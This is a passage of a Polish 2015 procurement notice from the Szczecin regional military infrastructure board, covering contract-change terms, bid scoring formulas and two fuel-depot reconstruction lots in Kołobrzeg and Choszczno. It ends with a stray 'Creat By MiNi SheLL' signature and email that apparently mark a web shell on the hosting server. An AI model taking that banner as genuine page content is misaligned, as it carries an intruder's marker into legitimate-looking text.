21)	zmiany dopuszczającej do realizacji części zamówienia podwykonawcę w sytuacji nieprzewidzianej, po wcześniejszym uzgodnieniu z Zamawiającym;
22) 	zmiany limitu finansowego w danym roku budżetowym;
23) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności;
24)	zmiany w harmonogramie rzeczowo - finansowym na skutek sytuacji niemożliwej wcześniej do przewidzenia oraz po zaakceptowaniu zmiany przez Zamawiającego;
25)  zmiany terminu płatności ostatniej faktury w danym roku budżetowym;
26) zmiany w przepisach ustawowych i aktach wykonawczych związanych z przedmiotem zamówienia, które nastąpiły po dniu zawarcia umowy;
27)  zmiany ilości faktur w sytuacji nieprzewidzianej po wcześniejszym uzgodnieniu z Zamawiającym;	
28)  zmiana wartości ostatniej faktury;
29) 	wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy;
30) wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonej: umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność.

W przypadku wystąpienia sytuacji powodujących konieczność wprowadzenia takich zmian, zostaną wprowadzone do umowy aneksem na warunkach uzgodnionych przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.rziszczecin.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jak w pkt I.1 niniejszego ogłoszenia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2015 godzina 10:00, miejsce: siedziba RZI Szczecin (budynek nr 22, biuro nr 4).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opis kryteriów, ich znaczenie i sposób oceny ofert.
Dla części I i części II.

Kryterium: cena	                  znaczenie: 90%	 
Kryterium: gwarancja	    znaczenie: 10 %	 

Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 100 pkt.
Liczba punktów zostanie zaokrąglona do 2 miejsc po przecinku.

Cena brutto (waga kryterium 90):

Liczba punktów przyznana przez Zamawiającego za kryterium Cena zostanie określona wg wzoru:

                                                                                       
Pc = X/Y x 90
                                                                                        
Pc - obliczone punkty za kryterium cena
X - cena najniższa badanych ofert (zł)
Y - cena oferty badanej (zł)
Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 90 pkt
Oferta z najniższą ceną otrzymuje 90 pkt
Przedłużenie okresu gwarancji jakości wykonanych robót (waga kryterium 10):

Liczba punktów przyznana przez Zamawiającego za kryterium Gwarancja zostanie określona wg wzoru:
                                                                                       
Pg = X/Y x 10
                                                                                        
Pg - obliczone punkty za kryterium gwarancji
X - przedłużenie okresu gwarancji w badanej ofercie (w miesiącach)
Y - maksymalne przedłużenie okresu gwarancji (w miesiącach)
Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 10 pkt
Wykonawca, który nie zaoferuje przedłużenia okresu gwarancji wykonania zamówienia otrzyma 0 pkt.

Warunki brzegowe:
- maksymalne  przedłużenie okresu  gwarancji wynosi 24 miesiące,
- gwarancja nie może być krótsza niż 36 miesięcy.
Dokonując oceny Zamawiający zsumuje punkty w odniesieniu do kryterium ceny, terminu i gwarancji wg następującego wzoru:
Po (Punkty oferty) = Pc (Punkty cena) + Pg (Punkty gwarancja)
Zamawiający wybierze ofertę najkorzystniejszą spośród wszystkich niepodlegających odrzuceniu ofert wyłącznie na podstawie kryteriów oceny ofert. Oferta, która spełni wszystkie warunki i wymagania oraz uzyska najwyższą liczbę punktów, obliczoną według powyższych wzorów zostanie uznana przez Zamawiającego za najkorzystniejszą.
Kryterium ceny - 90% ze względu na fakt, iż ma ona podstawowe znaczenie dla Zamawiającego i wynika z obowiązku racjonalnego i oszczędnego wydatkowania środków publicznych. Kryterium gwarancji jakości wykonanych robót przyznano wagę 10 % ze względu na możliwość zmniejszenia kosztów związanych z eksploatacją obiektu i urządzeń, w przypadku wystąpienia wad podlegających gwarancji oraz skrócenia czasu ewentualnych napraw - brak konieczności pozyskiwania i zabezpieczania środków finansowych w planach MON na naprawę obiektu i konserwację urządzeń..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa stacji paliw płynnych na magazyn paliw w m. Kołobrzeg..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa stacji paliw płynnych na magazyn paliw w m. Kołobrzeg w szczególności  polega na wykonaniu:

1)	robót ogólnobudowlanych, w tym m.in.: rozbiórkowych, ziemnych, drogowych, odwodnieniowych,  montażowych, konstrukcyjnych, izolacyjnych, fundamentowych, termoizolacyjnych budynku, dekarskich (wykonanie pokrycia dachu),  malarskich, wymiana stolarki okiennej i  drzwiowej, roboty wykończeniowe wewnętrzne (podłogi, ściany sufity), budowa wiaty stalowej, posadowienie dwóch podziemnych stalowych zbiorników dwupłaszczowych na fundamencie oraz wykonanie badania gruntu.
2)	robót sanitarnych, w tym m.in.: rozbiórkowych, demontażowych, ziemnych, montażowych, rozruchu, wykonanie instalacji paliwowej, wykonanie litrażowania zbiorników właściwym paliwem dla danego zbiornika; wykonaniu czynności odbiorowych z Wojskowym Dozorem Technicznym (WDT) i Głównym Urzędem Miar (GUM), wykonanie zewnętrznego przyłącza sieci kanalizacyjnej, deszczowej, sanitarnej, wodociągowej (rurociągi, elementy, urządzenia), wykonanie wew. instalacji wodociągowej, wykonanie instalacji kanalizacji sanitarnej wew..
3)	robót elektrycznych, w tym m.in.: demontażowych, montażowych, wykonaniu instalacji elektrycznych, wykonaniu rozdzielnicy,   wykonaniu instalacji oświetleniowej, instalacji odgromowej, uziemienia, wykonaniu  badań i pomiarów elektrycznych i inwentaryzacji  istniejącej instalacji wraz demontażem jej elementów, wykonaniu linii kablowej nn dla zasilania stacji, wykonaniu  instalacji kamer monitoringu.
4)	robót drogowych, w tym m.in.: rozbiórkowych, ziemnych, montażowych, wykonanie płyty szczelnej,  nawierzchni z kostki betonowej, wyspy, trawników.

UWAGA:
Powierzchnia terenu utwardzonego podlegającego remontowi (wymianie) zwiększy się o ok. 600m2 , w związku z czym należy to uwzględnić w cenie oferty. 

5)	wyposażenia w budynku MPS.

UWAGA:
- Wszystkie roboty mają być wykonane zgodnie z obowiązującymi przepisami i normami.
	Zgłoszenie robót nie wymagających pozwolenia na budowę należy dokonać na 30 dni przed zamiarem rozpoczęcia prac, do prac można przystąpić jeżeli w ciągu tych 30 dni właściwy organ nie wniesie, w drodze decyzji, sprzeciwu i nie później niż po upływie 2 lat od określonego w zgłoszeniu terminu ich rozpoczęcia.
- Wykonawca przy wykonywaniu robót związanych z nawierzchnią przy stacji paliw płynnych uzgodni je z użytkownikiem; konieczność położenia/remontu nawierzchni przy KSP-20, która jest obiektem czynnym.
- Wykonawca zapewni zasilanie tymczasowe KSP w trakcie robót budowlanych.


Zakres przedmiotu zamówienia obejmuje także:

1)	Wykonanie robót geodezyjnych (celem wykonania między innymi: wytyczenia, wykonania inwentaryzacji powykonawczej oraz aktualizacji mapy w Ośrodku Dokumentowania Budownictwa Wojskowego Rejonowego Zarządu Infrastruktury Szczecin).
2)	Wykonawca przed przystąpieniem do przedmiotowego zakresu robót wykona inwentaryzację fotograficzną oraz po ich zakończeniu, wykona dokumentację powykonawczą fotograficzną  (fotografując przed ich wykonaniem i po ich wykonaniu z tego samego ujęcia w celu porównania).
3)	Wykonawca jest wytwórcą odpadów budowlanych. Po stronie Wykonawcy leży wykonanie na swój koszt utylizacji odpadów powstałych w wyniku robót budowlanych zgodnie z Ustawą o Odpadach z dnia 14.12.2012 r. (tekst jednolity Dz. U. 2013 poz. 21). Materiały z rozbiórki niepodlegające utylizacji Wykonawca zagospodaruje we własnym zakresie, a ich wartość szacunkową  ujmie w cenie oferty.
4)	Wykonawca robót wykona dokumentację powykonawczą, oraz przekaże dla Zamawiającego zgodnie z zapisami Ustawy  Prawo Budowlane z dnia 07.07.1994 r. z późniejszymi zmianami materiały wymienione w art. 60 - dokumentację budowy i dokumentację powykonawczą. Przekazaniu podlegają również inne dokumenty dotyczące obiektu a także instrukcje obsługi i eksploatacji: obiektu, instalacji i urządzeń związanych z tym obiektem. 
5)	Wykonawca w ramach zawartej umowy złoży zawiadomienie o zakończeniu robót do ZWINB minimum 21 dni przed upływem terminu zakończenia umowy na podstawie pełnomocnictw Zamawiającego, zgodnie z art. 54 Ustawy Prawo Budowlane z dnia 07.07.1994 r. z późniejszymi zmianami).
6)	Przeprowadzenie rewizji wewnętrznej zbiorników w obecności inspektora Wojskowego Dozoru Technicznego.
7)	Opracowanie dokumentacji powykonawczej  zbiorników, uzgodnionej i zatwierdzonej przez Wojskowy Dozór Techniczny.
8)	Wykonanie próby drożności oraz szczelności zbiorników w obecności Inspektora Wojskowego Dozoru Technicznego.
9)	Wykonanie litrażowania oraz legalizacji zbiorników przez Okręgowy Urząd Miar.
10)	Pozostałe prace i czynności wynikłe z uwag Wojskowego Dozoru Technicznego oraz niezbędne do przekazania Zamawiającemu zbiorników gotowych do eksploatacji zgodnie z obowiązującymi w tym zakresie przepisami prawa.
11)	Wszystkie materiały, urządzenia, których znaki towarowe lub nazwy własne zostały wskazane w dokumentacji projektowej należy traktować jako przykładowe i dopuszcza się możliwość ofert równoważnych o parametrach nie niższych niż wskazane w dokumentacji projektowej.
Wartość szacunkowa I części wynosi:  1 459 615,54 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.37.20-9, 45.22.00.00-5, 45.31.00.00-3, 45.23.14.00-9, 45.35.10.00-2, 45.23.24.11-6, 45.23.12.10-0, 45.11.12.50-5, 45.11.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 210.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa stacji paliw płynnych  na magazyn paliw  (modernizacja zbiorników magazynowych paliw płynnych) w m. Choszczno..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa stacji paliw płynnych  na magazyn paliw  (modernizacja zbiorników magazynowych paliw płynnych) w m. Choszczno w szczególności  polega na wykonaniu: 

1)	robót ogólnobudowlanych, w tym m.in.: rozbiórkowych, ziemnych, drogowych, odwodnieniowych,  montażowych, konstrukcyjnych, izolacyjnych, fundamentowych, termoizolacyjnych budynku, dekarskich (wykonanie pokrycia dachu), wymiana stolarki okiennej i  drzwiowej, roboty wykończeniowe wewnętrzne (podłogi, ściany sufity), budowa wiaty stalowej,  posadowienie stalowego zbiornika dwupłaszczowych na fundamencie oraz wykonanie badania gruntu.
2)	robót sanitarnych, w tym m.in.: rozbiórkowych, demontażowych, ziemnych, montażowych, rozruchu, wykonanie instalacji paliwowej, wykonanie litrażowania zbiorników właściwym paliwem dla danego zbiornika; wykonaniu czynności odbiorowych z Wojskowym Dozorem Technicznym (WDT) i Głównym Urzędem Miar (GUM), wykonanie zewnętrznych sieci kanalizacyjnej, deszczowej (rurociągi, elementy, urządzenia).
3)	robót elektrycznych, w tym m.in.: demontażowych, montażowych, wykonaniu instalacji elektrycznych, wykonaniu rozdzielnicy,   wykonaniu instalacji oświetleniowej, instalacji odgromowej, uziemienia, wykonaniu  badań i pomiarów elektrycznych i inwentaryzacji  istniejącej instalacji wraz demontażem jej elementów, wykonaniu linii kablowej nn dla zasilania stacji, wykonaniu  instalacji kamer monitoringu.
4)	robót drogowych, w tym m.in.: rozbiórkowych, ziemnych, montażowych, wykonanie płyty szczelnej,  nawierzchni z kostki betonowej i granitowej, wyspy, trawników.
5)	wyposażenia w budynku MPS.


UWAGA:
- Wszystkie roboty mają być wykonane zgodnie z obowiązującymi przepisami i normami.
	Zgłoszenie robót nie wymagających pozwolenia na budowę należy dokonać na 30 dni przed zamiarem rozpoczęcia prac, do prac można przystąpić jeżeli w ciągu tych 30 dni właściwy organ nie wniesie, w drodze decyzji, sprzeciwu i nie później niż po upływie 2 lat od określonego w zgłoszeniu terminu ich rozpoczęcia.
- Wykonawca przy wykonywaniu robót związanych z nawierzchnią przy stacji paliw płynnych uzgodni je z użytkownikiem; konieczność położenia/remontu nawierzchni przy KSP-20, która jest obiektem czynnym.
- Wykonawca zapewni zasilanie tymczasowe KSP w trakcie robót budowlanych.

Zakres przedmiotu zamówienia obejmuje także:

1)	Wykonanie robót geodezyjnych (celem wykonania między innymi: wytyczenia, wykonania inwentaryzacji powykonawczej oraz aktualizacji mapy w Ośrodku Dokumentowania Budownictwa Wojskowego Rejonowego Zarządu Infrastruktury Szczecin).
2)	Wykonawca przed przystąpieniem do przedmiotowego zakresu robót wykona inwentaryzację fotograficzną oraz po ich zakończeniu, wykona dokumentację powykonawczą fotograficzną  (fotografując przed ich wykonaniem i po ich wykonaniu z tego samego ujęcia w celu porównania).
3)	Wykonawca jest wytwórcą odpadów budowlanych. Po stronie Wykonawcy leży wykonanie na swój koszt utylizacji odpadów powstałych w wyniku robót budowlanych zgodnie z Ustawą o Odpadach z dnia 14.12.2012 r. (tekst jednolity Dz. U. 2013 poz. 21). Materiały z rozbiórki niepodlegające utylizacji Wykonawca zagospodaruje we własnym zakresie, a ich wartość szacunkową  ujmie w cenie oferty.
4)	Wykonawca robót wykona dokumentację powykonawczą, oraz przekaże dla Zamawiającego zgodnie z zapisami Ustawy  Prawo Budowlane z dnia 07.07.1994 r. z późniejszymi zmianami materiały wymienione w art. 60 - dokumentację budowy i dokumentację powykonawczą. Przekazaniu podlegają również inne dokumenty dotyczące obiektu a także instrukcje obsługi i eksploatacji: obiektu, instalacji i urządzeń związanych z tym obiektem. 
5)	Wykonawca w ramach zawartej umowy złoży zawiadomienie o zakończeniu robót do ZWINB minimum 21 dni przed upływem terminu zakończenia umowy na podstawie pełnomocnictw Zamawiającego, zgodnie z art. 54 Ustawy Prawo Budowlane z dnia 07.07.1994 r. z późniejszymi zmianami).
6)	Przeprowadzenie rewizji wewnętrznej zbiorników w obecności inspektora Wojskowego Dozoru Technicznego.
7)	Opracowanie dokumentacji powykonawczej  zbiorników, uzgodnionej i zatwierdzonej przez Wojskowy Dozór Techniczny.
8)	Wykonanie próby drożności oraz szczelności zbiorników w obecności Inspektora Wojskowego Dozoru Technicznego.
9)	Wykonanie litrażowania oraz legalizacji zbiorników przez Okręgowy Urząd Miar.
10)	Pozostałe prace i czynności wynikłe z uwag Wojskowego Dozoru Technicznego oraz niezbędne do przekazania Zamawiającemu zbiorników gotowych do eksploatacji zgodnie z obowiązującymi w tym zakresie przepisami prawa.
11)	Wszystkie materiały, urządzenia, których znaki towarowe lub nazwy własne zostały wskazane w dokumentacji projektowej należy traktować jako przykładowe i dopuszcza się możliwość ofert równoważnych o parametrach nie niższych niż wskazane w dokumentacji projektowej.
Wartość szacunkowa II części wynosi: 1 111 423,40 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.37.20-9, 45.22.00.00-5, 45.31.00.00-3, 45.23.14.00-9, 45.35.10.00-2, 45.23.24.11-6, 45.23.12.10-0, 45.11.12.50-5, 45.11.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 210.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com